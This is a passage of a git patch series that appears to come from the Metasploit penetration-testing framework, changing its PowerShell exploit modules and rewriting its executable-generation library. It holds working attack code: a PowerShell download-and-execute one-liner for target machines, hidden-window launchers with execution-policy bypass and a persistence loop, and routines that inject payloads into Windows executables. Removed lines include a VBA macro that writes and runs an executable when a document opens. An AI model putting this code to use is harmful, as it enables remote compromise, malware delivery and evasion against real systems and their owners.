 		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
 		print_status("Run the following command on the target machine:")
-		print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+		print_line("powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}")
 	end
 end
 
diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index d93dd6e3b8..a95b93cdfb 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -46,12 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					'WfsDelay'     => 10,
 					'EXITFUNC' => 'thread'
 				},
-			'Payload'        =>
-				{
-					'Space'        => 8192,
-					'DisableNops'  => true,
-					'StackAdjustment' => -3500
-				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
@@ -70,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		))
 
 		register_options([
-			OptBool.new('DryRun',[false,'dry run',false]),
+			OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]),
 		], self.class)
 	end
 
@@ -82,8 +76,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
-			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
+		if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+			print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+		end
+
+		if datastore['PSH::run_wow64'] and target_arch.first == "x86_64"
+			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with PSH::run_wow64 enabled")
 		end
 
 		# Try and authenticate with given credentials
@@ -92,8 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				smb_login
 			rescue StandardError => autherror
 				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
-      ensure
-        disconnect
 			end
 			# Execute the powershell command
 			print_status("#{peer} - Executing the payload...")

From 243d3d6ebdc048994af9ac06d39c43ff01775a72 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 13 Sep 2013 19:06:37 +0100
Subject: [PATCH 012/321] Apply comments

---
 lib/msf/core/exploit/powershell.rb            | 22 ++++++++++---------
 .../exploits/windows/misc/psh_web_delivery.rb |  2 +-
 modules/exploits/windows/smb/psexec_psh.rb    | 18 ++++++---------
 3 files changed, 20 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index ec0cd1b451..43bdf44edf 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -11,11 +11,11 @@ module Exploit::Powershell
     super
     register_advanced_options(
       [
-				OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
-				OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
-        OptBool.new('PSH::RUN_WOW64', [
+        OptBool.new('PSH::persist', [true, 'Run the payload in a loop', false]),
+        OptBool.new('PSH::old_technique', [true, 'Use powershell 1.0', false]),
+        OptBool.new('PSH::run_wow64', [
           false,
-          'Execute powershell in 32bit compatibility mode, payloads need native arch',
+          'Execute powershell in 32bit compatibility mode, payloads need x86 arch',
           false
             ]),
         OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
@@ -28,12 +28,14 @@ module Exploit::Powershell
   #
   # Reads script into a PshScript
   #
-  def read_script(script)
-    return PshScript.new(script)
+  def read_script(script_path)
+    return PshScript.new(script_path)
   end
 
   #
   # Insert substitutions into the powershell script
+  # If script is a path to a file then read the file
+  # otherwise treat it as the contents of a file
   #
   def make_subs(script, subs)
     if ::File.file?(script)
@@ -81,7 +83,7 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   #
   def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
+    ps_args = " -e #{ compress_script(ps_code) } "
 
     ps_wrapper = <<EOS
 $si = New-Object System.Diagnostics.ProcessStartInfo
@@ -100,7 +102,7 @@ EOS
   #
   # Creates cmd script to execute psh payload
   #
-	def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
+  def cmd_psh_payload(pay, old_psh=datastore['PSH::old_method'], wow64=datastore['PSH::run_wow64'])
     # Allow powershell 1.0 format
     if old_psh
       psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
@@ -108,7 +110,7 @@ EOS
       psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
     end
     # Run our payload in a while loop
-    if datastore['PSH::PERSIST']
+    if datastore['PSH::persist']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
       sleep_time = rand(5)+5
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
@@ -119,7 +121,7 @@ EOS
     # Wrap in hidden runtime
     psh_payload = run_hidden_psh(psh_payload,ps_bin)
     # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start /min powershell.exe -Command \"#{psh_payload.gsub('"','\"')}\"\r\n"
+    command = "%COMSPEC% /B /C start /min powershell.exe -c #{psh_payload}\r\n"
   end
 
 
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 96036180a1..59beb856dd 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		url = get_uri()
 		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
 		print_status("Run the following command on the target machine:")
-		print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+		print_line("powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}")
 	end
 end
 
diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index d93dd6e3b8..a95b93cdfb 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -46,12 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					'WfsDelay'     => 10,
 					'EXITFUNC' => 'thread'
 				},
-			'Payload'        =>
-				{
-					'Space'        => 8192,
-					'DisableNops'  => true,
-					'StackAdjustment' => -3500
-				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
@@ -70,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		))
 
 		register_options([
-			OptBool.new('DryRun',[false,'dry run',false]),
+			OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]),
 		], self.class)
 	end
 
@@ -82,8 +76,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
-			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
+		if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+			print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+		end
+
+		if datastore['PSH::run_wow64'] and target_arch.first == "x86_64"
+			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with PSH::run_wow64 enabled")
 		end
 
 		# Try and authenticate with given credentials
@@ -92,8 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				smb_login
 			rescue StandardError => autherror
 				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
-      ensure
-        disconnect
 			end
 			# Execute the powershell command
 			print_status("#{peer} - Executing the payload...")

From aa4ad2b00587002dedc276c5d20d4a87512f2a71 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 13 Sep 2013 20:23:18 +0100
Subject: [PATCH 013/321] Change to ' and remove "

---
 lib/msf/core/exploit/powershell.rb | 26 ++++++++++++--------------
 1 file changed, 12 insertions(+), 14 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 43bdf44edf..09261f62b7 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -45,10 +45,7 @@ module Exploit::Powershell
     subs.each do |set|
       script.gsub!(set[0],set[1])
     end
-    # if datastore['VERBOSE']
-    #   print_good("Final Script: ")
-    #   script.each_line {|l| print_status("\t#{l}")}
-    # end
+
     return script
   end
 
@@ -83,17 +80,17 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   #
   def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = " -e #{ compress_script(ps_code) } "
+    ps_args = "-e #{ compress_script(ps_code) }"
 
     ps_wrapper = <<EOS
-$si = New-Object System.Diagnostics.ProcessStartInfo
-$si.FileName = "#{ps_bin}"
-$si.Arguments = '#{ps_args}'
-$si.UseShellExecute = $false
-$si.RedirectStandardOutput = $true
-$si.WindowStyle = 'Hidden'
-$si.CreateNoWindow = $True
-$p = [System.Diagnostics.Process]::Start($si)
+$si=New-Object System.Diagnostics.ProcessStartInfo
+$si.FileName=#{ps_bin}
+$si.Arguments='#{ps_args}'
+$si.UseShellExecute=$false
+$si.RedirectStandardOutput=$true
+$si.WindowStyle='Hidden'
+$si.CreateNoWindow=$true
+$p=[System.Diagnostics.Process]::Start($si)
 EOS
 
     return ps_wrapper.gsub("\n",';')
@@ -113,11 +110,12 @@ EOS
     if datastore['PSH::persist']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
       sleep_time = rand(5)+5
+      vprint_status("Sleep time set to #{sleep_time} seconds")
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
     # Determine appropriate architecture, manual method reduces script size
-		ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+		ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
     # Wrap in hidden runtime
     psh_payload = run_hidden_psh(psh_payload,ps_bin)
     # Convert to base64 for -encodedcommand execution

From 5a5b67b393f46b10afda2bc6aec8839f5c8fa3d9 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 13 Sep 2013 21:01:04 +0100
Subject: [PATCH 014/321] Get lastest exe

---
 lib/msf/util/exe.rb | 1879 ++++++++++++++++++++++++++++++++++++-------
 1 file changed, 1609 insertions(+), 270 deletions(-)
 mode change 100644 => 100755 lib/msf/util/exe.rb

diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
old mode 100644
new mode 100755
index 45d8458420..457806732a
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1,323 +1,1662 @@
-###
-#
-# framework-util-exe
-# --------------
-#
-# The class provides methods for creating and encoding executable file 
-# formats for various platforms. It is a replacement for the previous
-# code in Rex::Text
-#
-###
+# -*- coding: binary -*-
 
 module Msf
 module Util
+
+#
+# The class provides methods for creating and encoding executable file
+# formats for various platforms. It is a replacement for the previous
+# code in Rex::Text
+#
 class EXE
 
+require 'rex'
+require 'rex/peparsey'
+require 'rex/pescan'
+require 'rex/zip'
+require 'metasm'
+require 'digest/sha1'
+require 'msf/core/exe/segment_injector'
 
-	##
-	#
-	# Executable generators
-	#
-	##
-	
-	def self.to_executable(framework, arch, plat, code='')
-		if (arch.index(ARCH_X86))
+  ##
+  #
+  # Helper functions common to multiple generators
+  #
+  ##
 
-			if (plat.index(Msf::Module::Platform::Windows))
-				return to_win32pe(framework, code)
-			end
+  def self.set_template_default(opts, exe = nil, path = nil)
+    # If no path specified, use the default one.
+    path ||= File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates")
 
-			if (plat.index(Msf::Module::Platform::Linux))
-				return to_linux_x86_elf(framework, code)
-			end
-			
-			if(plat.index(Msf::Module::Platform::OSX))
-				return to_osx_x86_macho(framework, code)		
-			end	
-			
-			# XXX: Add remaining x86 systems here					
-		end
+    # If there's no default name, we must blow it up.
+    if not exe
+      raise RuntimeError, 'Ack! Msf::Util::EXE.set_template_default called w/o default exe name!'
+    end
 
-		if(arch.index(ARCH_ARMLE))
-			if(plat.index(Msf::Module::Platform::OSX))
-				return to_osx_arm_macho(framework, code)		
-			end
-			# XXX: Add Linux here
-		end
+    # Use defaults only if nothing is specified
+    opts[:template_path] ||= path
+    opts[:template] ||= exe
 
-		if(arch.index(ARCH_PPC))
-			if(plat.index(Msf::Module::Platform::OSX))
-				return to_osx_ppc_macho(framework, code)	
-			end
-			# XXX: Add PPC OS X and Linux here			
-		end						
-		nil
-	end
+    # Only use the path when the filename contains no separators.
+    if not opts[:template].include?(File::SEPARATOR)
+      opts[:template] = File.join(opts[:template_path], opts[:template])
+    end
 
-	
-	def self.to_win32pe(framework, code)
-		pe = ''
+    # Check if it exists now
+    return if File.file?(opts[:template])
 
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template.exe"), "rb")
-		pe = fd.read(fd.stat.size)
-		fd.close
+    # If it failed, try the default...
+    if opts[:fallback]
+      default_template = File.join(path, exe)
+      if File.file?(default_template)
+        # Perhaps we should warn about falling back to the default?
+        opts.merge!({ :fellback => default_template })
+        opts[:template] = default_template
+      end
+    end
+  end
 
-		if(code.length < 8192)
-			code << Rex::Text.rand_text(8192-code.length)
-		end
-		
-		bo = pe.index('PAYLOAD:')
-		pe[bo,  8192] = code if bo
-		pe[136,    4] = [rand(0x100000000)].pack('V')
+  def self.read_replace_script_template(filename, hash_sub)
+    template_pathname = File.join(Msf::Config.install_root, "data", "templates", "scripts", filename)
 
-		ci = pe.index("\x31\xc9" * 160)
-		cd = pe.index("\x31\xc9" * 160, ci + 320)
-		rc = pe[ci+320, cd-ci-320]
-		
-		# 640 + rc.length bytes of room to store an encoded rc at offset ci
-		enc = encode_stub(framework, [ARCH_X86], rc)
-		lft = 640+rc.length - enc.length
+    template = ''
+    File.open(template_pathname, "rb") do |f|
+      template = f.read
+    end
 
-		buf = enc + Rex::Text.rand_text(640+rc.length - enc.length)
-		pe[ci, buf.length] = buf
-		
-		# Make the data section executable
-		xi = pe.index([0xc0300040].pack('V'))
-		pe[xi,4] = [0xe0300020].pack('V')
-		
-		# Add a couple random bytes for fun
-		pe << Rex::Text.rand_text(rand(4096)+128)
+    return template % hash_sub
+  end
 
-		return pe
-	end
-	
-	def self.to_win32pe_service(framework, code, name='SERVICENAME')
-		pe = ''
 
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "service.exe"), "rb")
-		pe = fd.read(fd.stat.size)
-		fd.close
+  ##
+  #
+  # Executable generators
+  #
+  ##
 
-		bo = pe.index('PAYLOAD:')
-		pe[bo, 8192] = [code].pack('a8192') if bo
+  def self.to_executable(framework, arch, plat, code='', opts={})
+    if (arch.index(ARCH_X86))
 
-		bo = pe.index('SERVICENAME')
-		pe[bo, 11] = [name].pack('a11') if bo
-		
-		pe[136, 4] = [rand(0x100000000)].pack('V')
+      if (plat.index(Msf::Module::Platform::Windows))
+        return to_win32pe(framework, code, opts)
+      end
 
-		return pe
-	end
-	
-	def self.to_osx_arm_macho(framework, code)
-		mo = ''
+      if (plat.index(Msf::Module::Platform::Linux))
+        return to_linux_x86_elf(framework, code)
+      end
 
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template_armle_darwin.bin"), "rb")
-		mo = fd.read(fd.stat.size)
-		fd.close
+      if(plat.index(Msf::Module::Platform::OSX))
+        return to_osx_x86_macho(framework, code)
+      end
 
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+      if(plat.index(Msf::Module::Platform::BSD))
+        return to_bsd_x86_elf(framework, code)
+      end
 
-		mo[bo, 8192] = [code].pack('a8192') if bo
-		mo[co, 512]  = [note].pack('a512') if co
+      if(plat.index(Msf::Module::Platform::Solaris))
+        return to_solaris_x86_elf(framework, code)
+      end
 
-		return mo
-	end
+      # XXX: Add remaining x86 systems here
+    end
 
-	def self.to_osx_ppc_macho(framework, code)
-		mo = ''
+    if( arch.index(ARCH_X86_64) or arch.index( ARCH_X64 ) )
+      if (plat.index(Msf::Module::Platform::Windows))
+        return to_win64pe(framework, code, opts)
+      end
 
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template_ppc_darwin.bin"), "rb")
-		mo = fd.read(fd.stat.size)
-		fd.close
+      if (plat.index(Msf::Module::Platform::Linux))
+        return to_linux_x64_elf(framework, code, opts)
+      end
 
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+      if (plat.index(Msf::Module::Platform::OSX))
+        return to_osx_x64_macho(framework, code)
+      end
+    end
 
-		mo[bo, 8192] = [code].pack('a8192') if bo
-		mo[co, 512]  = [note].pack('a512') if co
+    if(arch.index(ARCH_ARMLE))
+      if(plat.index(Msf::Module::Platform::OSX))
+        return to_osx_arm_macho(framework, code)
+      end
 
-		return mo
-	end
-	
-	def self.to_osx_x86_macho(framework, code)
-		mo = ''
+      if(plat.index(Msf::Module::Platform::Linux))
+        return to_linux_armle_elf(framework, code)
+      end
 
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template_x86_darwin.bin"), "rb")
-		mo = fd.read(fd.stat.size)
-		fd.close
+      # XXX: Add remaining ARMLE systems here
+    end
 
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+    if(arch.index(ARCH_PPC))
+      if(plat.index(Msf::Module::Platform::OSX))
+        return to_osx_ppc_macho(framework, code)
+      end
+      # XXX: Add PPC OS X and Linux here
+    end
 
-		mo[bo, 8192] = [code].pack('a8192') if bo
-		mo[co, 512]  = [note].pack('a512') if co
+    if(arch.index(ARCH_MIPSLE))
+      if(plat.index(Msf::Module::Platform::Linux))
+        return to_linux_mipsle_elf(framework, code)
+      end
+      # XXX: Add remaining MIPSLE systems here
+    end
 
-		return mo
-	end
-		
-	def self.to_linux_x86_elf(framework, code)
-		mo = ''
+    if(arch.index(ARCH_MIPSBE))
+      if(plat.index(Msf::Module::Platform::Linux))
+        return to_linux_mipsbe_elf(framework, code)
+      end
+      # XXX: Add remaining MIPSLE systems here
+    end
+    nil
+  end
 
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "template_x86_linux.bin"), "rb")
-		mo = fd.read(fd.stat.size)
-		fd.close
+  def self.to_win32pe(framework, code, opts={})
 
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
+    # For backward compatability, this is roughly equivalent to 'exe-small' fmt
+    if opts[:sub_method]
+      if opts[:inject]
+        raise RuntimeError, 'NOTE: using the substitution method means no inject support'
+      end
 
-		mo[bo, 8192] = [code].pack('a8192') if bo
-		mo[co, 512]  = [note].pack('a512') if co
+      # use
+      return self.to_win32pe_exe_sub(framework, code, opts)
+    end
 
-		return mo
-	end
+    # Allow the user to specify their own EXE template
+    set_template_default(opts, "template_x86_windows.exe")
 
-	def self.to_exe_vba(exe='')
-		vba = ""
-		pcs = (exe.length/2000)+1
-		idx = 0
-		
-		var_base_idx = 0
-		var_base     =  Rex::Text.rand_text_alpha(2).capitalize
-		
-		var_bytes = var_base + (var_base_idx+=1).to_s
-		var_initx = var_base +  Rex::Text.rand_text_alpha(1) + (var_base_idx+=1).to_s
-		
-		vba << "Dim #{var_bytes}(#{exe.length}) as Byte\r\n\r\n"
-		1.upto(pcs) do |pc|
-			max = 0
-			vba << "Sub #{var_initx}#{pc}()\r\n"
-			
-			while(c = exe[idx] and max < 2000)
-				vba << "\t#{var_bytes}(#{idx}) = &H#{("%.2x" % c).upcase}\r\n"
-				idx += 1
-				max += 1
-			end	
-			vba << "End Sub\r\n"
-		end
-		
-		var_lname = var_base + (var_base_idx+=1).to_s
-		var_lpath = var_base + (var_base_idx+=1).to_s
-		var_appnr = var_base + (var_base_idx+=1).to_s
-		var_datnr = var_base + (var_base_idx+=1).to_s
-		
-		vba << "Sub Auto_Open()\r\n"
-		vba << "\tDim #{var_appnr} As Integer\r\n"
-		vba << "\tDim #{var_datnr} As Integer\r\n"
-		vba << "\tDim #{var_lname} As String\r\n"
-		vba << "\tDim #{var_lpath} As String\r\n"
-		vba << "\t#{var_lname} = \"#{rand_text_alpha(rand(8)+8)}.exe\"\r\n"
-		vba << "\t#{var_lpath} = Environ(\"USERPROFILE\")\r\n"
-		vba << "\tChDrive (#{var_lpath})\r\n"
-		vba << "\tChDir (#{var_lpath})\r\n"
-		vba << "\t#{var_datnr} = FreeFile()\r\n"
-		vba << "\tOpen #{var_lname}  For Binary Access Read Write As #{var_datnr}\r\n"
-		
-		1.upto(pcs) do |pc|
-			vba << "\t#{var_initx}#{pc}\r\n"
-		end
-		
-		vba << "\tPut #{var_datnr}, , #{var_bytes}\r\n"
-		vba << "\tClose #{var_datnr}\r\n"
-		vba << "\t#{var_appnr} = Shell(#{var_lname}, vbHide)\r\n"
-		vba << "End Sub\r\n"
-		
-		vba << "Sub AutoOpen()\r\n"
-		vba << "\tAuto_Open\r\n"
-		vba << "End Sub\r\n"
-		
-		vba << "Sub Workbook_Open()\r\n"
-		vba << "\tAuto_Open\r\n"
-		vba << "End Sub\r\n"
-				
-	end
+    # Copy the code to a new RWX segment to allow for self-modifying encoders
+    payload = win32_rwx_exec(code)
 
-	def self.to_win32pe_vba(framework, code)
-		to_exe_vba(to_win32pe(framework, code))
-	end
+    # Create a new PE object and run through sanity checks
+    endjunk = true
+    fsize = File.size(opts[:template])
+    pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
+    text = nil
+    sections_end = 0
+    pe.sections.each do |sec|
+      text = sec if sec.name == ".text"
+      sections_end = sec.size + sec.file_offset if sec.file_offset >= sections_end
+      endjunk = false if sec.contains_file_offset?(fsize-1)
+    end
+    #also check to see if there is a certificate
+    cert_entry = pe.hdr.opt['DataDirectory'][4]
+    #if the cert is the only thing past the sections, we can handle.
+    if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress']
+      endjunk = false
+    end
 
-	def self.to_exe_vbs(exe = '')
-		vbs = ""
+    #try to inject code into executable by adding a section without affecting executable behavior
+    if(opts[:inject])
+      injector = Msf::Exe::SegmentInjector.new({
+          :payload  => code,
+          :template => opts[:template],
+          :arch     => :x86
+      })
+      exe = injector.generate_pe
+      return exe
+    end
 
-		var_bytes =  Rex::Text.rand_text_alpha(rand(8)+8)
-		var_fname =  Rex::Text.rand_text_alpha(rand(8)+8)
-		var_func =  Rex::Text.rand_text_alpha(rand(8)+8)
-		var_stream =  Rex::Text.rand_text_alpha(rand(8)+8)
-		var_obj =  Rex::Text.rand_text_alpha(rand(8)+8)
-		var_shell =  Rex::Text.rand_text_alpha(rand(8)+8)
+    if(not text)
+      raise RuntimeError, "No .text section found in the template"
+    end
 
-		vbs << "Function #{var_func}()\r\n"
+    if ! text.contains_rva?(pe.hdr.opt.AddressOfEntryPoint)
+      raise RuntimeError, "The .text section does not contain an entry point"
+    end
 
-		vbs << "#{var_bytes} = Chr(&H#{("%02x" % exe[0])})"
-		
-		1.upto(exe.length) do |byte|
-			vbs << "&Chr(&H#{("%02x" % exe[byte])})" 
-		end	
-		vbs << "\r\n"
-		
-		vbs << "Dim #{var_obj}\r\n"
-		vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
-		vbs << "Dim #{var_stream}\r\n"
-		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(\"#{var_fname}.exe\")\r\n"
-		vbs << "#{var_stream}.Write #{var_bytes}\r\n"
-		vbs << "#{var_stream}.Close\r\n"
-		vbs << "Dim #{var_shell}\r\n"
-		vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"
-		vbs << "#{var_shell}.run(\"#{var_fname}.exe\")\r\n"
-		vbs << "End Function\r\n"
-		vbs << "#{var_func}\r\n"
-	end
+    p_length = payload.length + 256
+    if(text.size < p_length)
+      fname = ::File.basename(opts[:template])
+      msg  = "The .text section for '#{fname}' is too small. "
+      msg << "Minimum is #{p_length.to_s} bytes, your .text section is #{text.size.to_s} bytes"
+      raise RuntimeError, msg
+    end
 
-	def self.to_win32pe_vbs(framework, code)
-		to_exe_vbs(to_win32pe(framework, code))
-	end
+    # Store some useful offsets
+    off_ent = pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint)
+    off_beg = pe.rva_to_file_offset(text.base_rva)
 
-	# Creates a .NET DLL which loads data into memory
-	# at a specified location with read/execute permissions
-	#    - the data will be loaded at: base+0x2065
-	#    - max size is 0x8000 (32768)
-	def self.to_dotnetmem(base=0x12340000, data="")
-		pe = ''
+    # We need to make sure our injected code doesn't conflict with the
+    # the data directories stored in .text (import, export, etc)
+    mines = []
+    pe.hdr.opt['DataDirectory'].each do |dir|
+      next if dir.v['Size'] == 0
+      next if not text.contains_rva?( dir.v['VirtualAddress'] )
+      mines << [ pe.rva_to_file_offset(dir.v['VirtualAddress']) - off_beg, dir.v['Size'] ]
+    end
 
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "dotnetmem.dll"), "rb")
-		pe = fd.read(fd.stat.size)
-		fd.close
+    # Break the text segment into contiguous blocks
+    blocks = []
+    bidx   = 0
+    mines.sort{|a,b| a[0] <=> b[0]}.each do |mine|
+      bbeg = bidx
+      bend = mine[0]
+      if(bbeg != bend)
+        blocks << [bidx, bend-bidx]
+      end
+      bidx = mine[0] + mine[1]
+    end
 
-		# Configure the image base
-		pe[180, 4] = [base].pack('V')
-		
-		# Configure the TimeDateStamp
-		pe[136, 4] = [rand(0x100000000)].pack('V')
+    # Add the ending block
+    if(bidx < text.size - 1)
+      blocks << [bidx, text.size - bidx]
+    end
 
-		# XXX: Unfortunately we cant make this RWX only RX
-		# Mark this segment as read-execute AND writable
-		# pe[412,4] = [0xe0000020].pack("V")
-		
-		# Write the data into the .text segment
-		pe[0x1065, 0x8000] = [data].pack("a32768")
-		
-		# Generic a randomized UUID
-		pe[37656,16] = Rex::Text.rand_text(16)
-		
-		return pe
-	end
-	
-	
-	def self.encode_stub(framework, arch, code)
-		return code if not framework.encoders
-		framework.encoders.each_module_ranked('Arch' => arch) do |name, mod|
-			begin
-				enc = framework.encoders.create(name)
-				raw = enc.encode(code, '')
-				return raw if raw
-			rescue
-			end
-		end
-		nil
-	end
+    # Find the largest contiguous block
+    blocks.sort!{|a,b| b[1]<=>a[1]}
+    block = blocks[0]
 
+    # TODO: Allow the entry point in a different block
+    if(payload.length + 256 > block[1])
+      raise RuntimeError, "The largest block in .text does not have enough contiguous space (need:#{payload.length+256} found:#{block[1]})"
+    end
+
+    # Make a copy of the entire .text section
+    data = text.read(0,text.size)
+
+    # Pick a random offset to store the payload
+    poff = rand(block[1] - payload.length - 256)
+
+    # Flip a coin to determine if EP is before or after
+    eloc = rand(2)
+    eidx = nil
+
+    # Pad the entry point with random nops
+    entry = generate_nops(framework, [ARCH_X86], rand(200)+51)
+
+    # Pick an offset to store the new entry point
+    if(eloc == 0) # place the entry point before the payload
+      poff += 256
+      eidx = rand(poff-(entry.length + 5))
+    else          # place the entry pointer after the payload
+      poff -= 256
+      eidx = rand(block[1] - (poff + payload.length)) + poff + payload.length
+    end
+
+    # Relative jump from the end of the nops to the payload
+    entry += "\xe9" + [poff - (eidx + entry.length + 5)].pack('V')
+
+    # Mangle 25% of the original executable
+    1.upto(block[1] / 4) do
+      data[ block[0] + rand(block[1]), 1] = [rand(0x100)].pack("C")
+    end
+
+    # Patch the payload and the new entry point into the .text
+    data[block[0] + poff, payload.length] = payload
+    data[block[0] + eidx, entry.length]   = entry
+
+    # Create the modified version of the input executable
+    exe = ''
+    File.open(opts[:template], 'rb') { |fd|
+      exe = fd.read(fd.stat.size)
+    }
+
+    exe[ exe.index([pe.hdr.opt.AddressOfEntryPoint].pack('V')), 4] = [ text.base_rva + block[0] + eidx ].pack("V")
+    exe[off_beg, data.length] = data
+
+    tds = pe.hdr.file.TimeDateStamp
+    exe[ exe.index([ tds ].pack('V')), 4] = [tds - rand(0x1000000)].pack("V")
+
+    cks = pe.hdr.opt.CheckSum
+    if(cks != 0)
+      exe[ exe.index([ cks ].pack('V')), 4] = [0].pack("V")
+    end
+
+    pe.close
+
+    exe
+  end
+
+  def self.to_winpe_only(framework, code, opts={}, arch="x86")
+
+    if arch == ARCH_X86_64
+      arch = ARCH_X64
+    end
+
+    # Allow the user to specify their own EXE template
+    set_template_default(opts, "template_"+arch+"_windows.exe")
+
+    pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
+
+    exe = ''
+      File.open(opts[:template], 'rb') { |fd|
+        exe = fd.read(fd.stat.size)
+      }
+
+    sections_header = []
+    pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] }
+
+
+    #look for section with entry point
+    sections_header.each do |sec|
+      virtualAddress = sec[1][0xc,0x4].unpack('L')[0]
+      sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0]
